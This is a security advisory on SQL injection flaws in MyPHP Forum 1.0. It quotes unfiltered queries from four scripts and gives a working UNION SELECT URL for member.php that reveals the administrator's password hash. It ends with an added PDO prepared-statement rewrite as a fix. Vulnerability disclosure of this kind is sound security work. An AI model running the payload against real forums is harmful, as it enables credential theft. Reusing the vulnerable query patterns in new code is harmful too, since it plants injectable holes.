/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[Product Description]
MyPHP Forum is a simple message board script with limited features.

[Summary]
Several SQL injection vulnerabilities may lead to disclosure of sensitive information, including the hash of a user's password.

[Details]
User-supplied variables are inserted into SQL queries exactly as received, without any filtering.

[1] script name: forum.php
---[code]---
// $fid comes straight from the request and is interpolated into the query unescaped
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---
Possible SQL injection through the $fid variable, which is not filtered.

[2] script name: member.php
---[code]---
if($action == "viewpro") {
    // $member is taken from the GET parameters with no escaping or validation
    $member = $HTTP_GET_VARS['member'];
    $sql = "SELECT * FROM $db_member WHERE username='$member'";
    $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
    $member = mysql_fetch_array($query);
---[/code]---
SQL code injection:
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show the administrator's name and password hash (in the "Yahoo" field).

The password is encrypted by the encrypt() function:
---[code]---
function encrypt($string) {
    // the MD5 of the password serves as both the input and the salt of crypt()
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}
---[/code]---

[3] script name: forgot.php
---[code]---
$email = $_REQUEST['email'];
if (isset($email)) {
    $sql="SELECT * FROM $db_member WHERE email='$email'";
    ...
    $result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
    $username = mysql_result($result, 0);
    $msg = " Hello $username,
---[/code]---
The $email variable is not filtered.
IMPACT: Possible SQL injection through this variable.

[4] script name: include.php
This is the most important script: it is included by all the others. The $nbuser and $nbpass variables are not filtered.
---[code]---
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: possible SQL injection through $nbuser.

P.S. All bugs apply when magic_quotes_gpc=0.

/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */
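For comparison, a hardened rewrite of the member.php profile lookup and the forum.php lookup, added here as an example and not MyPHP Forum's own code: the user value is bound through a PDO prepared statement instead of being interpolated, the password column is never selected into the profile row, and $fid is validated as an integer before use. Table and column names come from the advisory; the PDO DSN and credentials are placeholders, and the table-name variables are assumed to come from the application's own config, not from the request.

```php
<?php
// Added example (not from the advisory or the product).
// Placeholder DSN/credentials; replace with the real config values.
$pdo = new PDO('mysql:host=localhost;dbname=forum', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

// member.php, action=viewpro: the username is a bound parameter, so input such as
//   nonexist' UNION SELECT ... password as yahoo ...
// is compared literally as a username and cannot alter the query. The password
// column is simply not part of the select list, so no code path can echo the hash.
function viewProfile(PDO $pdo, string $db_member, string $member): ?array {
    $sql = "SELECT uid, username, status, email, website, aim, msn, location, "
         . "sig, regdate, posts, yahoo FROM `$db_member` WHERE username = :username";
    $stmt = $pdo->prepare($sql);
    $stmt->execute([':username' => $member]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// forum.php: fid is numeric, so anything that is not an integer is rejected
// before it reaches the database, and the value is bound as an int.
function forumNav(PDO $pdo, string $db_forum, $fid): ?array {
    if (filter_var($fid, FILTER_VALIDATE_INT) === false) {
        return null; // caller answers 400/404 instead of die(mysql_error())
    }
    $stmt = $pdo->prepare("SELECT fid, name FROM `$db_forum` WHERE fid = :fid");
    $stmt->bindValue(':fid', (int) $fid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$action = $_GET['action'] ?? '';
if ($action === 'viewpro') {
    $row = viewProfile($pdo, 'nb_member', (string) ($_GET['member'] ?? ''));
    // Profile fields are user-controlled, so escape on output as well.
    echo $row ? htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8') : 'no such member';
}
```

Prepared statements make the fix independent of magic_quotes_gpc, which only escapes quotes and does nothing for the numeric $fid case.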